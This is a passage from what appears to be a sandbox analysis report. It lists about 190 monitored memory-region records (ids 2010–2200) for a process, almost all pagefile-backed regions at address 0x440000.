2010 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2011 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2012 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2013 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2014 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2015 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2016 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2017 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2018 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2019 start_va = 0x440000 end_va = 0x440fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2020 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2021 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2022 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 2023 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2024 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2025 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2026 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2027 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2028 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2029 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2030 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2031 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2032 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2033 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2034 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2035 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2036 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2037 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2038 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2039 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2040 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2041 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2042 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2043 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2044 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2045 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2046 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2047 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2048 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2049 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2050 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2051 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2052 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2053 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2054 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2055 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2056 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2057 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2058 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2059 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2060 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2061 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2062 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2063 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2064 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2065 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2066 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2067 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2068 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2069 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2070 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2071 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2072 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2073 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2074 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2075 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2076 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2077 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2078 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2079 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2080 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2081 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2082 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2083 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2084 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2085 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2086 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2087 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2088 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2089 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2090 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2091 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2092 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2093 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2094 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2095 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2096 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2097 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2098 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2099 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2100 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2101 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2102 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2103 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2104 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2105 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2106 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2107 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2108 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2109 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2110 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2111 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2112 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2113 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2114 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2115 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2116 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2117 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2118 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2119 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2120 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2121 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2122 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2123 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2124 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2125 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2126 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2127 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2128 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2129 start_va = 0x440000 end_va = 0x44ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2130 start_va = 0x440000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2131 start_va = 0x460000 end_va = 0x46efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 2132 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2133 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2134 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2135 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2136 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2137 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2138 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2139 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2140 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2141 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2142 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2143 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2144 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2145 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2146 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2147 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2148 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2149 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2150 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2151 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2152 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2153 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2154 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2155 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2156 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2157 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2158 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2159 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2160 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2161 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2162 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2163 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2164 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2165 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2166 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2167 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2168 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2169 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2170 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2171 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2172 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2173 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2174 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2175 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2176 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2177 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2178 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2179 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2180 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2181 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2182 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2183 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2184 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2185 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2186 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2187 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2188 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2189 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2190 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2191 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2192 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2193 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2194 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2195 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2196 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2197 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2198 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2199 start_va = 0x440000 end_va = 0x44efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 2200 start_va = 0x440000 end_va = 